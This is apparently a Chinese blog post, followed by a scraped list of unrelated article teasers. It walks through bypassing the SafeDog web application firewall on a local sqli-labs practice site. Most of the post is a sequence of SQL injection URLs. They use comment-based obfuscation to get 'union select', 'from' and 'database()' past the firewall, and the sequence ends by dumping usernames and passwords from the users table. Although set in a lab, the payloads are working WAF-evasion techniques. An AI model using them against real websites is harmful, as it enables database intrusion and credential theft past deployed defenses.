魏钦6666
魏钦6666

安全狗V3.512048版本绕过

安全狗安装

安全狗详细安装、遇见无此服务器解决、在windows中命令提示符中进入查看指定文件夹手动启动Apache_安全狗只支持 glibc_2.14 但是服务器是2.17_黑色地带(崛起)的博客-CSDN博客

安全狗 safedogwzApacheV3.5.exe

右键电脑右下角安全狗图标-->选择插件-->安装插件

以管理员身份运行cmd安装apache服务

httpd -k install -n apache2.4

安全狗V3.512048版本绕过_第1张图片

在安装的时候提示有一个服务名不能为空,这里需要phpstudy调整至系统服务模式。
 

安全狗V3.512048版本绕过_第2张图片

然后调出任务管理器界面,查看所有服务

安全狗V3.512048版本绕过_第3张图片

将服务写上,安装成功之后,注意不要选择在线安装服务器安全狗,安装之后会显示启动web服务失败,这里将phpstudy重启即可

使用恶意的参数进行测试下,安全狗生效
http://192.168.126.137/sqli-lab/Less-1/?id=1' union select 1,2,3 -- +

安全狗V3.512048版本绕过_第4张图片

测试单引号

判断闭合点为 '

http://192.168.110.130/sqli/Less-1/?id=1

http://192.168.110.130/sqli/Less-1/?id=1' #报错

安全狗V3.512048版本绕过_第5张图片

添加注释后显示正常

http://192.168.110.130/sqli/Less-1/?id=1'-- -

安全狗V3.512048版本绕过_第6张图片

测试and

直接用and 1=1发现被拦截

安全狗V3.512048版本绕过_第7张图片

当只是有and时并没有拦截只有报错,说明and和1不能同时出现

安全狗V3.512048版本绕过_第8张图片

用注释符去绕过,下面这俩个都可进行绕过

/*%2f!%2f!*/

and/*@%$^(*/ 1=1 --+

http://192.168.110.130/sqli/Less-1/?id=1' /*%2f!%2f!*/and 1=1 -- -

安全狗V3.512048版本绕过_第9张图片

http://192.168.110.130/sqli/Less-1/?id=1' and/*@%$^(*/ 1=1 --+

安全狗V3.512048版本绕过_第10张图片

union select 被拦截

order by 3判断字段数为3后,进行联合查询被拦截

http://192.168.110.130/sqli/Less-1/?id=1' order by 3 --+

http://192.168.110.130/sqli/Less-1/?id=1' union select 1,2, 3 --+

安全狗V3.512048版本绕过_第11张图片

union select 被拦截

http://192.168.110.130/sqli/Less-1/?id=1' union select --+

union 没有被拦截

http://192.168.110.130/sqli/Less-1/?id=1' union--+

select正常 说明一起查询会被拦截

http://192.168.110.130/sqli/Less-1/?id=1' select--+

使用注释符尝试绕过

http://192.168.110.130/sqli/Less-1/?id=1' union /*%2f!%2f!*/select --+

安全狗V3.512048版本绕过_第12张图片

显示正常

http://192.168.110.130/sqli/Less-1/?id=1' union /*%2f!%2f!*/select 1,2,3 --+

安全狗V3.512048版本绕过_第13张图片

database()被拦截

进行查询数据库,又被拦截

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2,database() --+

安全狗V3.512048版本绕过_第14张图片

直接使用内联注释符成功绕过

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2,database/**/ () --+

安全狗V3.512048版本绕过_第15张图片

接下来开始查表

http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+ 查表,

或者是:

http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ 查看所有的表

from 过滤

输入查表字段被拦截,from为关键字,需要进行绕过

union /*%2f!%2f!*/select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+

安全狗V3.512048版本绕过_第16张图片

正常

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2,table_name--+

加上from后被拦截

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2,table_name from--+

发现这里可以使用char()来绕过

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2, CHAR(102,114,111,109) --+

安全狗V3.512048版本绕过_第17张图片

由于后面没发继续下去,fuzz出新绕过方法 /*!%23/*%0afrom*/

成功查询到表名

union /*%2f!%2f!*/select 1,2, group_concat(table_name) /*!%23/*%0afrom*/ information_schema.tables where table_schema=0x7365637572697479 --+

安全狗V3.512048版本绕过_第18张图片

成功查询到列名

union /*%2f!%2f!*/select 1,2, group_concat(column_name) /*!%23/*%0afrom*/ information_schema.columns where table_name='users' --+

安全狗V3.512048版本绕过_第19张图片

将全部字段查询出来

union /*%2f!%2f!*/select 1,2, group_concat(concat_ws(0x7e,username, password)) /*!%23/*%0afrom*/ security.users -- -

安全狗V3.512048版本绕过_第20张图片

你可能感兴趣的:(安全,网络安全,数据库,web)

  • 鸿蒙HarmonyOS应用开发之使用Node-API接口进行线程安全开发 OpenHarmony_小贾 移动开发HarmonyOSOpenHarmonyharmonyos安全华为移动开发物联网APP
    场景介绍napi_create_threadsafe_function是Node-API接口之一,用于创建一个线程安全的JavaScript函数。主要用于在多个线程之间共享和调用,而不会出现竞争条件或死锁。例如以下场景:异步计算:如果需要进行耗时的计算或IO操作,可以创建一个线程安全的函数,将计算或IO操作放在另一个线程中执行,避免阻塞主线程,提高程序的响应速度。数据共享:如果多个线程需要访问同一
  • 读懂两会背后的“人民情怀” 满山的猴子你腚最红
    中共中央总书记、国家主席、中央军委主席习近平3月5日下午在参加他所在的十四届全国人大一次会议江苏代表团审议时强调,高质量发展是全面建设社会主义现代化国家的首要任务,必须以满足人民日益增长的美好生活需要为出发点和落脚点,把发展成果不断转化为生活品质,不断增强人民群众的获得感、幸福感、安全感。人民群众的事,再小也是大事。百年来,中国共产党始终与人民风雨同舟、心心相印,着力解决好群众急难愁盼问题,实现了
  • 开源GIS与Vue结合 桃子味的白开水
    相关插件安装推荐使用npm的方式安装,它能更好地和webpack打包工具配合使用。¶1、ol-----OpenLayers地图操作基础包[email protected]¶2、ol-ext-----OpenLayers扩展包npminstallol-ext¶3、proj4------前端投影转换包npminstallproj4¶4、turf------前端空间分析包npminstall@tur
  • Python 协程 & 异步编程 (asyncio) 入门介绍 linmeiyun 后端pythonpython爬虫学习开发语言机器学习
    在近期的编码工作过程中遇到了async和await装饰的函数,查询资料后了解到这种函数是基于协程的异步函数。这类编程方式称为异步编程,常用在IO较频繁的系统中,如:Tornadoweb框架、文件下载、网络爬虫等应用。协程能够在IO等待时间就去切换执行其他任务,当IO操作结束后再自动回调,那么就会大大节省资源并提供性能。接下来便简单的讲解一下异步编程相关概念以及案例演示。1.协程简介1.1协程的含义
  • ios流媒体直播整个框架介绍(HLS、RTSP) 少一些浮躁__ IOS
    一、HTTP(WebService)基于HTTP的渐进下载ProgressiveDownload流媒体播放仅是在完全下载后再播放模式基础上做了一些小的改进。与下载播放模式中必须等待整个文件下载完毕后才能开始播放不同,渐进下载客户端在开始播放之前仅需等待一段较短的时间用于下载和缓冲该媒体文件最前面的一部分数据,之后便可以一边下载一边播放。在正式开始播放之前的这一小段缓冲应使得后续即使在网络较为拥塞的
  • 每天知道多一点 Nanayai
    互联网头条】1.邮政编码或由个人地址ID取代,网友:隐私安全如何保证2.苹果再回应Siri泄露隐私:苹果暂停全球Siri评估计划3.滴滴顺风车首场用户恳谈会,用户代表:部分整改方案矫枉过正4.北京共享单车投放总量过剩严重,4家企业将退出或整改5.App排名刷榜:一条好评8毛钱,一个下载量2.2元!6.三星S10自燃手机机主起诉厂商8月19日将开庭,索赔1元7.董明珠称格力百分百不会爆雷:爆雷的白马
  • python连接oracle数据库报DPI-1047: Cannot locate a 64-bit Oracle Client library 没有星期八~ 数据库pythonoracle
    pthon版本和oracle客户端版本一致即可,即都为64位或都为32位importcx_Oracleimportsysimportostry:ifsys.platform.startswith("darwin"):lib_dir=os.path.join(os.environ.get("HOME"),"Downloads","instantclient_19_21")cx_Oracle.init
  • cx_Oracle.DatabaseError: DPI-1047: Cannot locate a 64-bit Oracle Client library 虚幻如影 pythonoracle数据库python
    pipinstallcx_Oracleimportcx_Oracle再导入该模块进行数据库连接的时候报错这个错误表明您的Python环境是64位的,但是您尝试使用的Oracle客户端库(oci.dll)是32位的根据官方给出的文档进行查看cx_Oracle8Installation—cx_Oracle8.3.0documentationhttps://cx-oracle.readthedocs.i
  • 电脑操作从零到精通:全方位入门资源包 马屿人
    本文还有配套的精品资源,点击获取简介:电脑快速入门资源下载提供了一系列教程,帮助初学者迅速掌握计算机基础知识和操作技能。教程涵盖了计算机组成部分、操作系统选择、文件管理、网络连接、办公软件应用、安全与维护、进阶技能等关键领域。资源包括详细的《电脑快速入门.PDF》教程和《***说明.txt》,初学者可借此逐步提升电脑操作技能,适应数字世界。1.计算机基础知识和组成部分1.1计算机硬件与软件概述计算
  • django 不用自带的mysql_Python MySQL 数据库连接 (三) mysqlclient django默认使用 许菲比 django不用自带的mysql
    Mysql驱动介绍MySQL-python(弃用):也就是MySQLdb,是对C语言操作MySQL数据库的一个简单封装。遵循了PythonDBAPIv2。但是只支持Python2,目前还不支持Python3。mysqlclient(安装难,但django官方默认):是MySQL-python的另外一个分支,支持Python3并且修复了一些bug。pymysql:纯Python实现的一个驱动,因为是
  • cx_Oracle 错误.DPI-1047:找不到 64 位 Oracle 客户端库 潮易 oracle数据库
    在Python中使用cx_Oracle模块与Oracle数据库进行交互时,如果遇到“DPI-1047:找不到64位Oracle客户端库”错误,通常是因为系统无法找到适合当前环境(操作系统、位数)的Oracle客户端库。解决这个问题的步骤大致如下:###1.安装对应版本的OracleInstantClient-**下载**:首先,根据你的操作系统类型(如Windows、macOS、Linux等)和位
  • 病毒防护关不了。系统误删文件,提示有病毒,易感染文件,Windows系统如何关,antimalware service executable 海海不掉头发 电脑错误
    最近电脑经常莫名卡顿,打开任务管理器,发现有这么个antimalware…的顽固的运行ing,而且还拒绝访问我关闭它。看了网上的帖子,win10家庭版可以通过一段程序安装组策略,但是一顿操作后还是关不了。然而我一顿找办法后最终发现了一个最傻瓜式的简单的方法:即:**360安全卫士—优化加速一下,嗖就好了!!!!**我凑,果然需要同行竞争啊。快去试试吧小伙伴!!!!!!!终于吧这个顽固跟“病毒”一样
  • 数据库原理及应用-期末考试试题及答案 海海不掉头发 每天学习一点点笔记all数据库程序人生恰饭经验分享其他
    单项选择题DB、DBMS和DBS三者之间的关系是()。A.DB包括DBMS和DBSB.DBS包括DB和DBMSC.DBMS包括DB和DBSD.不能相互包括对数据库物理存储方式的描述称为()A.外模式B.内模式C.概念模式D.逻辑模式在数据库三级模式间引入二级映象的主要作用是()A.提高数据与程序的独立性B.提高数据与程序的安全性C.保持数据与程序的一致性D.提高数据与程序的可移植性视图是一个“虚表
  • 数据库原理与技术(专升本)-含答案 海海不掉头发 每天学习一点点笔记all专升本数据库练习题sqlserver经验分享
    《数据库原理与技术》课程复习资料一、名词解释:数据管理DBDBMSDBSRDBMSDBAORDBMSSQL关系关系模型关系系统完整性控制属性2NF候选码二、单项选择题:1,任何由二个属性组成的关系可能是A.INFB.2NFC.3NFD.不能判定2.数据冗余引起的问题主要是花费A.时间B.空间C.时间与空间D.时间或空间3.在数据库中,存储冗余数据是A.不应该的B.应该且合理的C.合理的但不能过度冗
  • Webpack | vite | Rollup | Gulp | Grunt 比较 前端阿彬 前端实用知识学习webpackgulp前端vite打包工具
    前言模块化管理工具和自动化构建工具是不同的。两者主要体现在侧重点不一样。自动化构建工具侧重于前端开发的整个过程的控制管理(像是流水线)。而模块化管理工具更侧重于模块打包,当然我们可以把开发中的所有资源(图片、js文件、css文件等)都可以看成模块。Webpackwebpack可以说是当前最流行的模块化管理工具和打包工具。其通过loader的转换,可以将任何形式的资源视作模块。它还可以将各个模块通过
  • 线程的死锁和并发安全 榴月~ Javajava
    在多线程编程中,线程的死锁和并发安全是两个重要的概念。理解这两个概念并正确地管理它们,对于编写高效且可靠的并发程序至关重要。线程的死锁死锁(Deadlock)是指两个或多个线程相互等待对方释放已经持有的资源,导致它们无法继续执行的现象。死锁会导致程序卡住,无法继续执行。死锁的四个必要条件互斥条件:一个资源一次只能被一个线程占用。持有并等待条件:一个线程已经持有至少一个资源,但又申请新的资源,而该资
  • 【网络安全】如何预防xss 不会代码的小徐 web安全xss安全
    XSS(Cross-SiteScripting,跨站脚本攻击)是一种代码注入攻击。攻击者通过在目标网站注入恶意脚本,使其在用户浏览器中执行,从而窃取用户敏感信息如Cookie和SessionID。CSS在前端已经被用了,为了避免歧义用了XSS作为缩写。XSS的本质是恶意代码与网站正常代码混在一起,浏览器无法分辨它们的可信度,最终导致恶意代码被执行。XSS的危害浏览器无法区分恶意代码和正常代码,它们
  • HTML5 <video>常用属性、时间、方法及基础使用说明 Wu Youlu java前端javascript
    简介HTML元素用于在文档中嵌入媒体播放器,用于支持文档内的视频播放。标签也可用于播放音频,但播放音频用更加适合。元素支持三种视频格式:MP4,WebM,和Ogg:MP4=带有H.264视频编码和AAC音频编码的MPEG4文件WebM=带有VP8视频编码和Vorbis音频编码的WebM文件Ogg=带有Theora视频编码和Vorbis音频编码的Ogg文件基础写法Yourbrowserdoesnot
  • Vue3+vite打包配置及部分打包优化~ 炒毛豆 vue.js前端
    这里介绍的是vite项目的打包配置,若想了解webpack打包配置可看我的其他博客。(下面来介绍下vite打包配置的步骤)1、步骤一:配置base。(为什么需要配置base?这里配置base主要是修改根路径,一般我们在开发环境中引用静态资源可能使用的是绝对路径,但是一旦打包部署到服务器上后可能会报404,无法正确的获取的资源。)//在vite.config.ts中import{defineConf
  • 浏览器打开网站此站点不安全问题 张俊凯
    浏览器报错信息image.pngimage.pngimage.png问题分析一个浏览器不可以,其他浏览器可以,修复单个浏览器清理浏览器缓存,重启浏览器重新安装安全证书重新安装浏览器(不推荐)所有浏览器都不行,系统问题,修复系统,刷新网络状态更新系统时间网络连接禁用启用重启系统手动更换IP宽带连接断开再连接路由器重启拔网线再插
  • 零宽字符引发的问题 MJ_Partake
    遇到问题,在系统界面搜索"MZ-0156"搜索不到商品,在navicat数据库直接搜索却可以搜索到。image.pngimage.png可以看到数据库里面是有数据的,而且为了确认是不是空格的问题,我还特别复制出来看是不是带有空格。这时我注意到数据库的搜索条件是“包含”。把它改成“=”。出来的结果是:image.png明明长得一模一样的两个字符串,为什么会出现这种问题呢?'MZ-0156'和'MZ-
  • mysql创建数据库和表 golove666 后端mysql数据库关系型数据库
    mysql创建数据库和表一、创建MySQL数据库1.1.登录MySQL1.2.创建数据库1.3.使用数据库二、创建MySQL表2.1.创建基本表2.2.查看表结构2.3.插入数据2.4.查询数据2.5.创建具有外键的表三、更多MySQL操作3.1.修改表3.2.删除表3.3.删除数据库四、完整操作示例在MySQL中创建数据库和表的过程非常简单。以下是详细的步骤和常见的SQL语句来帮助你完成这项任务
  • Docker的110个命令,高级开发运维工程师必备 golove666 运维运维dockerdocker命令
    Docker的110个命令1.基本信息查询命令2.容器管理命令3.镜像管理命令4.网络管理命令5.卷管理命令6.容器运行选项命令7.DockerCompose命令8.DockerSwarm命令9.安全管理命令10.系统调试命令以下是分类列出的110个常用Docker命令,涵盖镜像、容器、网络、卷、Swarm集群等多个方面的管理操作。1.基本信息查询命令序号命令说明1dockerversion查看D
  • QMetry自动化框架:一站式功能测试解决方案 芮奕滢Kirby
    QMetry自动化框架:一站式功能测试解决方案qafQualityAutomationFrameworkforweb,mobileweb,mobilenativeandrestweb-serviceusingSelenium,webdrier,TestNGandJavaJersey项目地址:https://gitcode.com/gh_mirrors/qa/qaf项目介绍QMetry自动化框架(Q
  • 解决django连接mysql数据库时,不使用mysqlclient驱动 NO.北极找北 mysqldjangopython
    在项目根目录__init__.py文件中写入下面代码importpymysql#pymysql.version_info=(1,4,13,"final",0)pymysql.install_as_MySQLdb()
  • 在 Linux 上部署javaWeb项目+图文详解_java web项目部署到linux服务器 2401_85154737 服务器linuxjava
    -f:force强制的意思,如果目标文件已经存在,不会询问直接覆盖-i:若目标已经存在,就会询问是否覆盖-u:若目标文件已经存在,且比目标文件新,才会更新#该命令可以把多个文件一次移动到一个文件夹中,但是最后的一个目标文件一要是“目录”。例如:mvfile1file2file3dir#把多个文件移动到dir目录中mvfile1file2#把file重命名为file26、rm命令该命令用于删除文件或
  • 安全第一 刘欣昊
    我听妈妈说,上周六有几个小朋友去冰上玩,不小心掉到冰窟窿里了,有小姐倆捞上来时已经淹死了。好可怕啊!我们一定要远离危险的地方,安全第一!图片发自App
  • 【LINUX】阿里云linux服务器上使用iptables设置安全策略的方法_status=$(grep -i ubuntu etc issue) 2401_85154737 linux服务器阿里云
    yuminstall-yiptablesiptables安装好后就可以来配置规则了。由于作为web服务器来使用,所以对外要开放80端口,另外肯定要通过ssh进行服务器管理,22端口也要对外开放,当然最好是把ssh服务的默认端口改掉,在公网上会有很多人试图破解密码的,如果修改端口,记得要把该端口对外开发,否则连不上就悲剧了。下面提供配置规则的详细说明:第一步:清空所有规则当ChainINPUT(po
  • cx_Oracle Python 库连接 Oracle 数据库时遇到报错 陈吉俊 数据库oraclepython
    这个错误DPI-1047:Cannotlocatea64-bitOracleClientlibrary:"Thespecifiedmodulecouldnotbefound"是在尝试使用cx_OraclePython库连接Oracle数据库时遇到的。这个错误表明cx_Oracle无法找到Oracle客户端库(通常称为InstantClient)。要解决这个问题,请按照以下步骤操作:下载Oracle
  • 大学课程-人机交互期末复习 海海不掉头发 每天学习一点点人机交互
    绪论什么是人机交互技术?⭐⭐是指关于设计、评价和实现供人们使用的交互式计算机系统,并围绕相关的主要现象进行研究的学。狭义的讲,人机交互技术主要是研究人与计算机之间的信息交换,它主要包括人到计算机和计算机到人的信息交换两部分。简单介绍人机交互技术的研究内容?⭐⭐人机交互的研究内容十分广泛,涵盖了建模、设计、评估等理论和方法,以及在Web、移动计算、虚拟现实等方面的应用研究,主要包括以下内容:人机交互
  • windows下源码安装golang 616050468 golang安装golang环境windows
             系统: 64位win7, 开发环境:sublime text 2,  go版本: 1.4.1    1.  安装前准备(gcc, gdb, git)        golang在64位系
  • redis批量删除带空格的key bylijinnan redis
    redis批量删除的通常做法: redis-cli keys "blacklist*" | xargs redis-cli del 上面的命令在key的前后没有空格时是可以的,但有空格就不行了: $redis-cli keys "blacklist*" 1) "blacklist:12: [email protected]
  • oracle正则表达式的用法 0624chenhong oracle正则表达式
      方括号表达示 方括号表达式 描述 [[:alnum:]] 字母和数字混合的字符 [[:alpha:]] 字母字符 [[:cntrl:]] 控制字符 [[:digit:]] 数字字符 [[:graph:]] 图像字符 [[:lower:]] 小写字母字符 [[:print:]] 打印字符 [[:punct:]] 标点符号字符 [[:space:]]
  • 2048源码(核心算法有,缺少几个anctionbar,以后补上) 不懂事的小屁孩 2048
    2048游戏基本上有四部分组成, 1:主activity,包含游戏块的16个方格,上面统计分数的模块 2:底下的gridview,监听上下左右的滑动,进行事件处理, 3:每一个卡片,里面的内容很简单,只有一个text,记录显示的数字 4:Actionbar,是游戏用重新开始,设置等功能(这个在底下可以下载的代码里面还没有实现) 写代码的流程 1:设计游戏的布局,基本是两块,上面是分
  • jquery内部链式调用机理 换个号韩国红果果 JavaScriptjquery
    只需要在调用该对象合适(比如下列的setStyles)的方法后让该方法返回该对象(通过this  因为一旦一个函数称为一个对象方法的话那么在这个方法内部this(结合下面的setStyles)指向这个对象) function create(type){ var element=document.createElement(type); //this=element;
  • 你订酒店时的每一次点击 背后都是NoSQL和云计算 蓝儿唯美 NoSQL
    全球最大的在线旅游公司Expedia旗下的酒店预订公司,它运营着89个网站,跨越68个国家,三年前开始实验公有云,以求让客户在预订网站上查询假期酒店时得到更快的信息获取体验。 云端本身是用于驱动网站的部分小功能的,如搜索框的自动推荐功能,还能保证处理Hotels.com服务的季节性需求高峰整体储能。 Hotels.com的首席技术官Thierry Bedos上个月在伦敦参加“2015 Clou
  • java笔记1 a-john java
    1,面向对象程序设计(Object-oriented Propramming,OOP):java就是一种面向对象程序设计。 2,对象:我们将问题空间中的元素及其在解空间中的表示称为“对象”。简单来说,对象是某个类型的实例。比如狗是一个类型,哈士奇可以是狗的一个实例,也就是对象。 3,面向对象程序设计方式的特性:     3.1 万物皆为对象。    
  • C语言 sizeof和strlen之间的那些事 C/C++软件开发求职面试题 必备考点(一) aijuans C/C++求职面试必备考点
            找工作在即,以后决定每天至少写一个知识点,主要是记录,逼迫自己动手、总结加深印象。当然如果能有一言半语让他人收益,后学幸运之至也。如有错误,还希望大家帮忙指出来。感激不尽。        后学保证每个写出来的结果都是自己在电脑上亲自跑过的,咱人笨,以前学的也半吊子。很多时候只能靠运行出来的结果再反过来
  • 程序员写代码时就不要管需求了吗? asia007 程序员不能一味跟需求走
          编程也有2年了,刚开始不懂的什么都跟需求走,需求是怎样就用代码实现就行,也不管这个需求是否合理,是否为较好的用户体验。当然刚开始编程都会这样,但是如果有了2年以上的工作经验的程序员只知道一味写代码,而不在写的过程中思考一下这个需求是否合理,那么,我想这个程序员就只能一辈写敲敲代码了。       我的技术不是很好,但是就不代
  • Activity的四种启动模式 百合不是茶 android栈模式启动Activity的标准模式启动栈顶模式启动单例模式启动
    android界面的操作就是很多个activity之间的切换,启动模式决定启动的activity的生命周期 ;   启动模式xml中配置     <activity android:name=".MainActivity" android:launchMode="standard&quo
  • Spring中@Autowired标签与@Resource标签的区别 bijian1013 javaspring@Resource@Autowired@Qualifier
    Spring不但支持自己定义的@Autowired注解,还支持由JSR-250规范定义的几个注解,如:@Resource、 @PostConstruct及@PreDestroy。   1. @Autowired    @Autowired是Spring 提供的,需导入    Package:org.springframewo
  • Changes Between SOAP 1.1 and SOAP 1.2 sunjing ChangesEnableSOAP 1.1SOAP 1.2
    JAX-WS SOAP Version 1.2 Part 0: Primer (Second Edition) SOAP Version 1.2 Part 1: Messaging Framework (Second Edition) SOAP Version 1.2 Part 2: Adjuncts (Second Edition)   Which style of WSDL
  • 【Hadoop二】Hadoop常用命令 bit1129 hadoop
    以Hadoop运行Hadoop自带的wordcount为例,   hadoop脚本位于/home/hadoop/hadoop-2.5.2/bin/hadoop,需要说明的是,这些命令的使用必须在Hadoop已经运行的情况下才能执行   Hadoop HDFS相关命令  hadoop fs -ls  列出HDFS文件系统的第一级文件和第一级
  • java异常处理(初级) 白糖_ javaDAOspring虚拟机Ajax
    从学习到现在从事java开发一年多了,个人觉得对java只了解皮毛,很多东西都是用到再去慢慢学习,编程真的是一项艺术,要完成一段好的代码,需要懂得很多。 最近项目经理让我负责一个组件开发,框架都由自己搭建,最让我头疼的是异常处理,我看了一些网上的源码,发现他们对异常的处理不是很重视,研究了很久都没有找到很好的解决方案。后来有幸看到一个200W美元的项目部分源码,通过他们对异常处理的解决方案,我终
  • 记录整理-工作问题 braveCS 工作
    1)那位同学还是CSV文件默认Excel打开看不到全部结果。以为是没写进去。同学甲说文件应该不分大小。后来log一下原来是有写进去。只是Excel有行数限制。那位同学进步好快啊。 2)今天同学说写文件的时候提示jvm的内存溢出。我马上反应说那就改一下jvm的内存大小。同学说改用分批处理了。果然想问题还是有局限性。改jvm内存大小只能暂时地解决问题,以后要是写更大的文件还是得改内存。想问题要长远啊
  • org.apache.tools.zip实现文件的压缩和解压,支持中文 bylijinnan apache
    刚开始用java.util.Zip,发现不支持中文(网上有修改的方法,但比较麻烦) 后改用org.apache.tools.zip org.apache.tools.zip的使用网上有更简单的例子 下面的程序根据实际需求,实现了压缩指定目录下指定文件的方法 import java.io.BufferedReader; import java.io.BufferedWrit
  • 读书笔记-4 chengxuyuancsdn 读书笔记
    1、JSTL 核心标签库标签 2、避免SQL注入 3、字符串逆转方法 4、字符串比较compareTo 5、字符串替换replace 6、分拆字符串 1、JSTL 核心标签库标签共有13个, 学习资料:http://www.cnblogs.com/lihuiyy/archive/2012/02/24/2366806.html 功能上分为4类: (1)表达式控制标签:out
  • [物理与电子]半导体教材的一个小问题 comsci 问题
          各种模拟电子和数字电子教材中都有这个词汇-空穴       书中对这个词汇的解释是; 当电子脱离共价键的束缚成为自由电子之后,共价键中就留下一个空位,这个空位叫做空穴       我现在回过头翻大学时候的教材,觉得这个
  • Flashback Database --闪回数据库 daizj oracle闪回数据库
    Flashback 技术是以Undo segment中的内容为基础的, 因此受限于UNDO_RETENTON参数。要使用flashback 的特性,必须启用自动撤销管理表空间。 在Oracle 10g中, Flash back家族分为以下成员: Flashback Database, Flashback Drop,Flashback Query(分Flashback Query,Flashbac
  • 简单排序:插入排序 dieslrae 插入排序
    public void insertSort(int[] array){ int temp; for(int i=1;i<array.length;i++){ temp = array[i]; for(int k=i-1;k>=0;k--)
  • C语言学习六指针小示例、一维数组名含义,定义一个函数输出数组的内容 dcj3sjt126com c
    # include <stdio.h> int main(void) { int * p; //等价于 int *p 也等价于 int* p; int i = 5; char ch = 'A'; //p = 5; //error //p = &ch; //error //p = ch; //error p = &i; //
  • centos下php redis扩展的安装配置3种方法 dcj3sjt126com redis
    方法一 1.下载php redis扩展包  代码如下 复制代码 #wget http://redis.googlecode.com/files/redis-2.4.4.tar.gz 2 tar -zxvf 解压压缩包,cd /扩展包 (进入扩展包然后 运行phpize 一下是我环境中phpize的目录,/usr/local/php/bin/phpize (一定要
  • 线程池(Executors) shuizhaosi888 线程池
    在java类库中,任务执行的主要抽象不是Thread,而是Executor,将任务的提交过程和执行过程解耦 public interface Executor { void execute(Runnable command); }   public class RunMain implements Executor{ @Override pub
  • openstack 快速安装笔记 haoningabc openstack
    前提是要配置好yum源 版本icehouse,操作系统redhat6.5 最简化安装,不要cinder和swift 三个节点 172 control节点keystone glance horizon 173 compute节点nova 173 network节点neutron control /etc/sysctl.conf net.ipv4.ip_forward =
  • 从c面向对象的实现理解c++的对象(二) jimmee C++面向对象虚函数
    1. 类就可以看作一个struct,类的方法,可以理解为通过函数指针的方式实现的,类对象分配内存时,只分配成员变量的,函数指针并不需要分配额外的内存保存地址。 2. c++中类的构造函数,就是进行内存分配(malloc),调用构造函数 3. c++中类的析构函数,就时回收内存(free) 4. c++是基于栈和全局数据分配内存的,如果是一个方法内创建的对象,就直接在栈上分配内存了。 专门在
  • 如何让那个一个div可以拖动 lingfeng520240 html
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml
  • 第10章 高级事件(中) onestopweb 事件
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • 计算两个经纬度之间的距离 roadrunners 计算纬度LBS经度距离
    要解决这个问题的时候,到网上查了很多方案,最后计算出来的都与百度计算出来的有出入。下面这个公式计算出来的距离和百度计算出来的距离是一致的。 /** * * @param longitudeA * 经度A点 * @param latitudeA * 纬度A点 * @param longitudeB *
  • 最具争议的10个Java话题 tomcat_oracle java
    1、Java8已经到来。什么!? Java8 支持lambda。哇哦,RIP Scala!   随着Java8 的发布,出现很多关于新发布的Java8是否有潜力干掉Scala的争论,最终的结论是远远没有那么简单。Java8可能已经在Scala的lambda的包围中突围,但Java并非是函数式编程王位的真正觊觎者。    2、Java 9 即将到来    Oracle早在8月份就发布
  • zoj 3826 Hierarchical Notation(模拟) 阿尔萨斯 rar
    题目链接:zoj 3826 Hierarchical Notation 题目大意:给定一些结构体,结构体有value值和key值,Q次询问,输出每个key值对应的value值。 解题思路:思路很简单,写个类词法的递归函数,每次将key值映射成一个hash值,用map映射每个key的value起始终止位置,预处理完了查询就很简单了。 这题是最后10分钟出的,因为没有考虑value为{}的情
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他